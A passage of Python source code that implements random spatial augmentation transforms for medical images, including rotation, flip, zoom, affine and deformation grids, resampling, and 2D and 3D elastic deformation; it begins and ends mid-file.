        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.align_corners = align_corners
        self.dtype = dtype
        # sampled angles, populated by randomize()
        self.x = 0.0
        self.y = 0.0
        self.z = 0.0

    def randomize(self, data: Optional[Any] = None) -> None:
        """Sample whether to rotate and the angle for each axis."""
        super().randomize(None)
        if not self._do_transform:
            return None
        self.x = self.R.uniform(low=self.range_x[0], high=self.range_x[1])
        self.y = self.R.uniform(low=self.range_y[0], high=self.range_y[1])
        self.z = self.R.uniform(low=self.range_z[0], high=self.range_z[1])

    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: Union[DtypeLike, torch.dtype] = None,
        randomize: bool = True,
        get_matrix: bool = False,
    ):
        """Rotate channel-first ``img``; with ``get_matrix=True`` also return
        the applied rotation matrix (matrix is None when no rotation occurred).
        """
        if randomize:
            self.randomize()
        if not self._do_transform:
            return img
        rotator = Rotate(
            # img.ndim == 3 means channel + 2 spatial dims, i.e. a 2D rotation
            angle=self.x if img.ndim == 3 else (self.x, self.y, self.z),
            keep_size=self.keep_size,
            mode=look_up_option(mode or self.mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
            align_corners=self.align_corners if align_corners is None else align_corners,
            dtype=dtype or self.dtype or img.dtype,
        )
        img = rotator(img)
        return (img, rotator.get_rotation_matrix()) if get_matrix else img
class RandFlip(RandomizableTransform):
    """Flip the image along the given spatial axes with probability ``prob``."""

    backend = Flip.backend

    def __init__(self, prob: float = 0.1, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
        """
        Args:
            prob: probability of flipping.
            spatial_axis: axes to flip; ``None`` means all spatial axes.
        """
        RandomizableTransform.__init__(self, prob)
        self.flipper = Flip(spatial_axis=spatial_axis)

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """Apply the flip, or return ``img`` unchanged when the coin flip says no."""
        if randomize:
            self.randomize(None)
        return self.flipper(img) if self._do_transform else img
class RandAxisFlip(RandomizableTransform):
    """Flip the image along one randomly chosen spatial axis, with probability ``prob``."""

    backend = Flip.backend

    def __init__(self, prob: float = 0.1) -> None:
        RandomizableTransform.__init__(self, prob)
        # spatial axis sampled by randomize(); None until first sampling
        self._axis: Optional[int] = None

    def randomize(self, data: NdarrayOrTensor) -> None:
        """Sample whether to flip and which spatial axis of ``data`` to flip."""
        super().randomize(None)
        if self._do_transform:
            self._axis = self.R.randint(data.ndim - 1)

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """Apply the sampled flip, or return ``img`` unchanged."""
        if randomize:
            self.randomize(data=img)
        if not self._do_transform:
            return img
        return Flip(spatial_axis=self._axis)(img)
class RandZoom(RandomizableTransform):
    """Randomly zoom the input with factors sampled uniformly from
    ``[min_zoom, max_zoom]``, with probability ``prob``.
    """

    backend = Zoom.backend

    def __init__(
        self,
        prob: float = 0.1,
        min_zoom: Union[Sequence[float], float] = 0.9,
        max_zoom: Union[Sequence[float], float] = 1.1,
        mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
        padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
        align_corners: Optional[bool] = None,
        keep_size: bool = True,
        **kwargs,
    ) -> None:
        """
        Args:
            prob: probability of zooming.
            min_zoom: lower bound(s) of the zoom factor.
            max_zoom: upper bound(s); must have the same length as ``min_zoom``.
            mode, padding_mode, align_corners, keep_size, kwargs: forwarded to ``Zoom``.

        Raises:
            AssertionError: when ``min_zoom`` and ``max_zoom`` differ in length.
        """
        RandomizableTransform.__init__(self, prob)
        self.min_zoom = ensure_tuple(min_zoom)
        self.max_zoom = ensure_tuple(max_zoom)
        if len(self.min_zoom) != len(self.max_zoom):
            raise AssertionError("min_zoom and max_zoom must have same length.")
        self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
        self.padding_mode = padding_mode
        self.align_corners = align_corners
        self.keep_size = keep_size
        self.kwargs = kwargs
        self._zoom: Sequence[float] = [1.0]

    def randomize(self, img: NdarrayOrTensor) -> None:
        """Sample whether to zoom and the per-dimension zoom factors."""
        super().randomize(None)
        if not self._do_transform:
            return None
        self._zoom = [self.R.uniform(l, h) for l, h in zip(self.min_zoom, self.max_zoom)]
        if len(self._zoom) == 1:
            # to keep the spatial shape ratio, use same random zoom factor for all dims
            self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 1)
        elif len(self._zoom) == 2 and img.ndim > 3:
            # if 2 zoom factors provided for 3D data, use the first factor for H and W dims, second factor for D dim
            self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 2) + ensure_tuple(self._zoom[-1])

    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[InterpolateMode, str]] = None,
        padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
        align_corners: Optional[bool] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """Apply a random zoom to channel-first ``img`` (or return it unchanged)."""
        # match the spatial image dim
        if randomize:
            self.randomize(img=img)
        if not self._do_transform:
            return img
        return Zoom(
            self._zoom,
            keep_size=self.keep_size,
            mode=look_up_option(mode or self.mode, InterpolateMode),
            padding_mode=padding_mode or self.padding_mode,
            # BUG FIX: `align_corners or self.align_corners` silently discarded an
            # explicit `align_corners=False`; test against None instead, matching
            # the handling in Zoom.__call__.
            align_corners=self.align_corners if align_corners is None else align_corners,
            **self.kwargs,
        )(img)
class AffineGrid(Transform):
    """Build an affine-transformed sampling grid from rotate/shear/translate/scale
    parameters, or apply an explicit ``affine`` matrix directly.
    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_params: Optional[Union[Sequence[float], float]] = None,
        shear_params: Optional[Union[Sequence[float], float]] = None,
        translate_params: Optional[Union[Sequence[float], float]] = None,
        scale_params: Optional[Union[Sequence[float], float]] = None,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float32,
        affine: Optional[NdarrayOrTensor] = None,
    ) -> None:
        """
        Args:
            rotate_params, shear_params, translate_params, scale_params: parameters
                for the corresponding elementary affine components; ``None``/falsy
                values skip that component.
            as_tensor_output: deprecated, unused.
            device: device for torch-backed grids.
            dtype: grid computation dtype.
            affine: if given, used as-is instead of composing from the parameters.
        """
        self.rotate_params = rotate_params
        self.shear_params = shear_params
        self.translate_params = translate_params
        self.scale_params = scale_params
        self.device = device
        self.dtype = dtype
        self.affine = affine

    def __call__(
        self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
    ) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
        """Return the transformed grid and the affine matrix that was applied.

        Args:
            spatial_size: used to create an identity grid when ``grid`` is None.
            grid: an existing grid to transform in place of a fresh one.

        Raises:
            ValueError: when both ``grid`` and ``spatial_size`` are None.
        """
        if grid is None:  # create grid from spatial_size
            if spatial_size is None:
                raise ValueError("Incompatible values: grid=None and spatial_size=None.")
            grid = create_grid(spatial_size, device=self.device, backend="torch", dtype=self.dtype)
        _b = TransformBackends.TORCH if isinstance(grid, torch.Tensor) else TransformBackends.NUMPY
        _device = grid.device if isinstance(grid, torch.Tensor) else self.device
        affine: NdarrayOrTensor
        if self.affine is None:
            # compose the affine from the elementary parts; the multiplication
            # order (rotate, shear, translate, scale) determines the result
            spatial_dims = len(grid.shape) - 1
            affine = (
                torch.eye(spatial_dims + 1, device=_device)
                if _b == TransformBackends.TORCH
                else np.eye(spatial_dims + 1)
            )
            if self.rotate_params:
                affine = affine @ create_rotate(spatial_dims, self.rotate_params, device=_device, backend=_b)
            if self.shear_params:
                affine = affine @ create_shear(spatial_dims, self.shear_params, device=_device, backend=_b)
            if self.translate_params:
                affine = affine @ create_translate(spatial_dims, self.translate_params, device=_device, backend=_b)
            if self.scale_params:
                affine = affine @ create_scale(spatial_dims, self.scale_params, device=_device, backend=_b)
        else:
            affine = self.affine
        grid, *_ = convert_data_type(grid, torch.Tensor, device=_device, dtype=self.dtype or grid.dtype)
        affine, *_ = convert_to_dst_type(affine, grid)
        # apply the affine to every grid point: flatten spatial dims, multiply, reshape back
        grid = (affine @ grid.reshape((grid.shape[0], -1))).reshape([-1] + list(grid.shape[1:]))
        return grid, affine
class RandAffineGrid(Randomizable, Transform):
    """Generate an affine grid with randomly sampled rotate/shear/translate/scale
    parameters drawn from the given ranges.
    """

    backend = AffineGrid.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            rotate_range, shear_range, translate_range, scale_range: per-dimension
                sampling ranges; a scalar ``v`` samples from ``(-v, v)``, a pair
                samples from ``(min, max)``, ``None`` skips that dimension.
            as_tensor_output: deprecated, unused.
            device: device for the generated grid.
        """
        self.rotate_range = ensure_tuple(rotate_range)
        self.shear_range = ensure_tuple(shear_range)
        self.translate_range = ensure_tuple(translate_range)
        self.scale_range = ensure_tuple(scale_range)
        # sampled parameters, populated by randomize()
        self.rotate_params: Optional[List[float]] = None
        self.shear_params: Optional[List[float]] = None
        self.translate_params: Optional[List[float]] = None
        self.scale_params: Optional[List[float]] = None
        self.device = device
        # affine matrix of the most recent __call__
        self.affine: Optional[NdarrayOrTensor] = None

    def _get_rand_param(self, param_range, add_scalar: float = 0.0):
        """Sample one value per entry of ``param_range``; ``add_scalar`` shifts
        the result (used to centre scale factors around 1.0).
        """
        out_param = []
        for f in param_range:
            if issequenceiterable(f):
                if len(f) != 2:
                    raise ValueError("If giving range as [min,max], should only have two elements per dim.")
                out_param.append(self.R.uniform(f[0], f[1]) + add_scalar)
            elif f is not None:
                out_param.append(self.R.uniform(-f, f) + add_scalar)
        return out_param

    def randomize(self, data: Optional[Any] = None) -> None:
        """Sample all affine parameters (order of draws is part of the contract)."""
        self.rotate_params = self._get_rand_param(self.rotate_range)
        self.shear_params = self._get_rand_param(self.shear_range)
        self.translate_params = self._get_rand_param(self.translate_range)
        self.scale_params = self._get_rand_param(self.scale_range, 1.0)

    def __call__(
        self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
    ) -> NdarrayOrTensor:
        """Sample fresh parameters and return the resulting affine grid."""
        self.randomize()
        affine_grid = AffineGrid(
            rotate_params=self.rotate_params,
            shear_params=self.shear_params,
            translate_params=self.translate_params,
            scale_params=self.scale_params,
            device=self.device,
        )
        _grid: NdarrayOrTensor
        _grid, self.affine = affine_grid(spatial_size, grid)
        return _grid

    def get_transformation_matrix(self) -> Optional[NdarrayOrTensor]:
        """Return the affine matrix of the most recent call, or ``None``."""
        return self.affine
class RandDeformGrid(Randomizable, Transform):
    """Generate a random deformation grid: a control grid whose points are
    perturbed by Gaussian noise scaled by a magnitude drawn from ``magnitude_range``.
    """

    backend = [TransformBackends.TORCH]

    def __init__(
        self,
        spacing: Union[Sequence[float], float],
        magnitude_range: Tuple[float, float],
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            spacing: control-grid spacing per spatial dimension.
            magnitude_range: (min, max) range of the random offset magnitude.
            as_tensor_output: if False, convert the result to a numpy array.
            device: device on which to create the grid.
        """
        self.spacing = spacing
        self.magnitude = magnitude_range
        self.rand_mag = 1.0
        self.as_tensor_output = as_tensor_output
        self.random_offset: np.ndarray
        self.device = device

    def randomize(self, grid_size: Sequence[int]) -> None:
        """Sample per-control-point offsets and the global magnitude.

        The normal draw happens before the uniform draw; keep this order so
        seeded runs stay reproducible.
        """
        self.random_offset = self.R.normal(size=([len(grid_size)] + list(grid_size))).astype(np.float32, copy=False)
        self.rand_mag = self.R.uniform(self.magnitude[0], self.magnitude[1])

    def __call__(self, spatial_size: Sequence[int]):
        """Build and return the randomly perturbed control grid for ``spatial_size``."""
        self.spacing = fall_back_tuple(self.spacing, (1.0,) * len(spatial_size))
        control_grid = create_control_grid(spatial_size, self.spacing, device=self.device, backend="torch")
        self.randomize(control_grid.shape[1:])
        _offset, *_ = convert_to_dst_type(self.rand_mag * self.random_offset, control_grid)
        # only the coordinate channels (not the homogeneous channel) are perturbed
        control_grid[: len(spatial_size)] += _offset
        if not self.as_tensor_output:
            control_grid, *_ = convert_data_type(control_grid, output_type=np.ndarray, dtype=np.float32)
        return control_grid
class Resample(Transform):
    """Resample a channel-first image at the locations given by a sampling grid,
    using the compiled ``grid_pull`` extension when available, otherwise
    ``torch.nn.functional.grid_sample``.
    """

    backend = [TransformBackends.TORCH]

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        as_tensor_output: bool = True,
        norm_coords: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float64,
    ) -> None:
        """
        Args:
            mode: interpolation mode used to sample the input.
            padding_mode: how coordinates outside the image are handled.
            as_tensor_output: deprecated, unused.
            norm_coords: whether to rescale the grid coordinates into the range
                the chosen backend expects (see the per-branch comments below).
            device: device for the resampling computation.
            dtype: computation dtype; the output is converted back toward the input type.
        """
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.norm_coords = norm_coords
        self.device = device
        self.dtype = dtype

    def __call__(
        self,
        img: NdarrayOrTensor,
        grid: Optional[NdarrayOrTensor] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        dtype: DtypeLike = None,
    ) -> NdarrayOrTensor:
        """Resample ``img`` at ``grid``; keyword args override constructor values.

        Raises:
            ValueError: when ``grid`` is None.
        """
        if grid is None:
            raise ValueError("Unknown grid.")
        _device = img.device if isinstance(img, torch.Tensor) else self.device
        _dtype = dtype or self.dtype or img.dtype
        img_t, *_ = convert_data_type(img, torch.Tensor, device=_device, dtype=_dtype)
        grid_t = convert_to_dst_type(grid, img_t)[0]
        if grid_t is grid:  # copy if needed (convert_data_type converts to contiguous)
            grid_t = grid_t.clone(memory_format=torch.contiguous_format)
        sr = min(len(img_t.shape[1:]), 3)  # spatial rank, capped at 3
        if USE_COMPILED:
            if self.norm_coords:
                # rescale each coordinate channel for grid_pull, dividing by the
                # homogeneous (last) channel
                for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
                    grid_t[i] = (max(dim, 2) / 2.0 - 0.5 + grid_t[i]) / grid_t[-1:]
            grid_t = moveaxis(grid_t[:sr], 0, -1)  # type: ignore
            _padding_mode = self.padding_mode if padding_mode is None else padding_mode
            _padding_mode = _padding_mode.value if isinstance(_padding_mode, GridSamplePadMode) else _padding_mode
            bound = 1 if _padding_mode == "reflection" else _padding_mode
            _interp_mode = self.mode if mode is None else mode
            _interp_mode = _interp_mode.value if isinstance(_interp_mode, GridSampleMode) else _interp_mode
            # map string modes to grid_pull's integer interpolation orders
            if _interp_mode == "bicubic":
                interp = 3
            elif _interp_mode == "bilinear":
                interp = 1
            else:
                interp = _interp_mode  # type: ignore
            out = grid_pull(
                img_t.unsqueeze(0), grid_t.unsqueeze(0), bound=bound, extrapolate=True, interpolation=interp
            )[0]
        else:
            if self.norm_coords:
                # normalize coordinates into grid_sample's [-1, 1] range,
                # dividing by the homogeneous (last) channel
                for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
                    grid_t[i] = 2.0 / (max(2, dim) - 1.0) * grid_t[i] / grid_t[-1:]
            # grid_sample expects reversed (x-last) coordinate ordering
            index_ordering: List[int] = list(range(sr - 1, -1, -1))
            grid_t = moveaxis(grid_t[index_ordering], 0, -1)  # type: ignore
            out = torch.nn.functional.grid_sample(
                img_t.unsqueeze(0),
                grid_t.unsqueeze(0),
                mode=self.mode.value if mode is None else GridSampleMode(mode).value,
                padding_mode=self.padding_mode.value if padding_mode is None else GridSamplePadMode(padding_mode).value,
                align_corners=True,
            )[0]
        out_val, *_ = convert_to_dst_type(out, dst=img, dtype=np.float32)
        return out_val
class Affine(Transform):
    """Apply an affine transformation: builds a grid with ``AffineGrid`` and
    resamples the input with ``Resample``.
    """

    backend = list(set(AffineGrid.backend) & set(Resample.backend))

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_params: Optional[Union[Sequence[float], float]] = None,
        shear_params: Optional[Union[Sequence[float], float]] = None,
        translate_params: Optional[Union[Sequence[float], float]] = None,
        scale_params: Optional[Union[Sequence[float], float]] = None,
        affine: Optional[NdarrayOrTensor] = None,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        norm_coords: bool = True,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float32,
        image_only: bool = False,
    ) -> None:
        """
        Args:
            rotate_params, shear_params, translate_params, scale_params, affine:
                forwarded to ``AffineGrid``.
            spatial_size: output spatial size; falls back to the input shape.
            mode, padding_mode: resampling options.
            norm_coords, device, dtype: forwarded to ``Resample``/``AffineGrid``.
            as_tensor_output: deprecated, unused.
            image_only: if True, return only the image (no affine matrix).
        """
        self.affine_grid = AffineGrid(
            rotate_params=rotate_params,
            shear_params=shear_params,
            translate_params=translate_params,
            scale_params=scale_params,
            affine=affine,
            dtype=dtype,
            device=device,
        )
        self.image_only = image_only
        self.resampler = Resample(norm_coords=norm_coords, device=device, dtype=dtype)
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor]]:
        """Transform channel-first ``img``; returns the image, or
        ``(image, affine)`` when ``image_only`` is False.
        """
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        grid, affine = self.affine_grid(spatial_size=sp_size)
        ret = self.resampler(img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode)
        return ret if self.image_only else (ret, affine)
class RandAffine(RandomizableTransform):
    """Random affine transform with optional caching of the identity grid for
    a fixed ``spatial_size``.
    """

    backend = Affine.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        cache_grid: bool = False,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            prob: probability of applying the random affine.
            rotate_range, shear_range, translate_range, scale_range: forwarded
                to ``RandAffineGrid``.
            spatial_size: output spatial size; falls back to the input shape.
            mode, padding_mode: resampling options.
            cache_grid: pre-compute and reuse the identity grid (requires a
                non-dynamic ``spatial_size``).
            as_tensor_output: deprecated, unused.
            device: device for grid generation and resampling.
        """
        RandomizableTransform.__init__(self, prob)
        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)
        self.spatial_size = spatial_size
        self.cache_grid = cache_grid
        self._cached_grid = self._init_identity_cache()
        self.mode: GridSampleMode = GridSampleMode(mode)
        self.padding_mode: GridSamplePadMode = GridSamplePadMode(padding_mode)

    def _init_identity_cache(self):
        """Pre-compute the identity grid when caching is enabled and the
        spatial size is fully specified; otherwise warn (if requested) and
        return None.
        """
        if self.spatial_size is None:
            if self.cache_grid:
                warnings.warn(
                    "cache_grid=True is not compatible with the dynamic spatial_size, please specify 'spatial_size'."
                )
            return None
        _sp_size = ensure_tuple(self.spatial_size)
        _ndim = len(_sp_size)
        if _sp_size != fall_back_tuple(_sp_size, [1] * _ndim) or _sp_size != fall_back_tuple(_sp_size, [2] * _ndim):
            # dynamic shape because it falls back to different outcomes
            if self.cache_grid:
                warnings.warn(
                    "cache_grid=True is not compatible with the dynamic spatial_size "
                    f"'spatial_size={self.spatial_size}', please specify 'spatial_size'."
                )
            return None
        return create_grid(spatial_size=_sp_size, device=self.rand_affine_grid.device, backend="torch")

    def get_identity_grid(self, spatial_size: Sequence[int]):
        """Return the cached identity grid, or create one for ``spatial_size``.

        Raises:
            RuntimeError: when ``spatial_size`` is dynamic (contains fallback values).
        """
        ndim = len(spatial_size)
        if spatial_size != fall_back_tuple(spatial_size, [1] * ndim) or spatial_size != fall_back_tuple(
            spatial_size, [2] * ndim
        ):
            raise RuntimeError(f"spatial_size should not be dynamic, got {spatial_size}.")
        return (
            create_grid(spatial_size=spatial_size, device=self.rand_affine_grid.device, backend="torch")
            if self._cached_grid is None
            else self._cached_grid
        )

    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "RandAffine":
        """Seed both this transform and the nested ``RandAffineGrid``."""
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self

    def randomize(self, data: Optional[Any] = None) -> None:
        """Sample whether to transform; if so, sample the affine parameters."""
        super().randomize(None)
        if not self._do_transform:
            return None
        self.rand_affine_grid.randomize()

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """Apply the (possibly identity) random affine to channel-first ``img``."""
        if randomize:
            self.randomize()
        # if not doing transform and spatial size doesn't change, nothing to do
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        do_resampling = self._do_transform or (sp_size != ensure_tuple(img.shape[1:]))
        if not do_resampling:
            img, *_ = convert_data_type(img, dtype=torch.float32, device=self.resampler.device)
        grid = self.get_identity_grid(sp_size)
        if self._do_transform:
            grid = self.rand_affine_grid(grid=grid)
        out: NdarrayOrTensor = self.resampler(
            img=img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class Rand2DElastic(RandomizableTransform):
    """Random 2D elastic deformation: a random deformation of a coarse control
    grid composed with a random affine, then resampled.
    """

    backend = Resample.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        spacing: Union[Tuple[float, float], float],
        magnitude_range: Tuple[float, float],
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Tuple[int, int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        as_tensor_output: bool = False,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            spacing: control-grid spacing; forwarded to ``RandDeformGrid``.
            magnitude_range: deformation magnitude range; forwarded to ``RandDeformGrid``.
            prob: probability of applying the deformation.
            rotate_range, shear_range, translate_range, scale_range: forwarded
                to ``RandAffineGrid``.
            spatial_size: output spatial size; falls back to the input shape.
            mode, padding_mode: resampling options.
            as_tensor_output: deprecated, unused.
            device: device for grid generation and resampling.
        """
        RandomizableTransform.__init__(self, prob)
        self.deform_grid = RandDeformGrid(
            spacing=spacing, magnitude_range=magnitude_range, as_tensor_output=True, device=device
        )
        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)
        self.device = device
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)

    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "Rand2DElastic":
        """Seed this transform and both nested random grid generators."""
        self.deform_grid.set_random_state(seed, state)
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self

    def randomize(self, spatial_size: Sequence[int]) -> None:
        """Sample whether to transform; if so, sample deformation and affine params."""
        super().randomize(None)
        if not self._do_transform:
            return None
        self.deform_grid.randomize(spatial_size)
        self.rand_affine_grid.randomize()

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Tuple[int, int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """Apply the (possibly identity) elastic deformation to channel-first ``img``."""
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        if randomize:
            self.randomize(spatial_size=sp_size)
        if self._do_transform:
            grid = self.deform_grid(spatial_size=sp_size)
            grid = self.rand_affine_grid(grid=grid)
            # upsample the coarse control grid to the full image resolution
            grid = torch.nn.functional.interpolate(
                recompute_scale_factor=True,
                input=grid.unsqueeze(0),
                scale_factor=list(ensure_tuple(self.deform_grid.spacing)),
                mode=InterpolateMode.BICUBIC.value,
                align_corners=False,
            )
            # crop the upsampled grid back to the requested spatial size
            grid = CenterSpatialCrop(roi_size=sp_size)(grid[0])
        else:
            _device = img.device if isinstance(img, torch.Tensor) else self.device
            grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
        out: NdarrayOrTensor = self.resampler(
            img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class Rand3DElastic(RandomizableTransform):
    """Random 3D elastic deformation: Gaussian-smoothed random offsets added to
    an identity grid, composed with a random affine, then resampled.
    """

    backend = Resample.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        sigma_range: Tuple[float, float],
        magnitude_range: Tuple[float, float],
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        as_tensor_output: bool = False,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            sigma_range: (min, max) of the Gaussian smoothing sigma.
            magnitude_range: (min, max) of the offset magnitude.
            prob: probability of applying the deformation.
            rotate_range, shear_range, translate_range, scale_range: forwarded
                to ``RandAffineGrid``.
            spatial_size: output spatial size; falls back to the input shape.
            mode, padding_mode: resampling options.
            as_tensor_output: deprecated, unused.
            device: device for grid generation and resampling.
        """
        RandomizableTransform.__init__(self, prob)
        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)
        self.sigma_range = sigma_range
        self.magnitude_range = magnitude_range
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.device = device
        # sampled state, populated by randomize()
        self.rand_offset: np.ndarray
        self.magnitude = 1.0
        self.sigma = 1.0

    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "Rand3DElastic":
        """Seed this transform and the nested ``RandAffineGrid``."""
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self

    def randomize(self, grid_size: Sequence[int]) -> None:
        """Sample whether to transform; if so, sample offsets, magnitude, sigma
        and the affine parameters (in this fixed order, for reproducibility).
        """
        super().randomize(None)
        if not self._do_transform:
            return None
        self.rand_offset = self.R.uniform(-1.0, 1.0, [3] + list(grid_size)).astype(np.float32, copy=False)
        self.magnitude = self.R.uniform(self.magnitude_range[0], self.magnitude_range[1])
        self.sigma = self.R.uniform(self.sigma_range[0], self.sigma_range[1])
        self.rand_affine_grid.randomize()

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """Apply the (possibly identity) elastic deformation to channel-first 3D ``img``."""
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        if randomize:
            self.randomize(grid_size=sp_size)
        _device = img.device if isinstance(img, torch.Tensor) else self.device
        grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
        if self._do_transform:
            if self.rand_offset is None:
                raise RuntimeError("rand_offset is not initialized.")
            # smooth the raw offsets, scale by the sampled magnitude, add to the grid
            gaussian = GaussianFilter(3, self.sigma, 3.0).to(device=_device)
            offset = torch.as_tensor(self.rand_offset, device=_device).unsqueeze(0)
            grid[:3] += gaussian(offset)[0] * self.magnitude
            grid = self.rand_affine_grid(grid=grid)
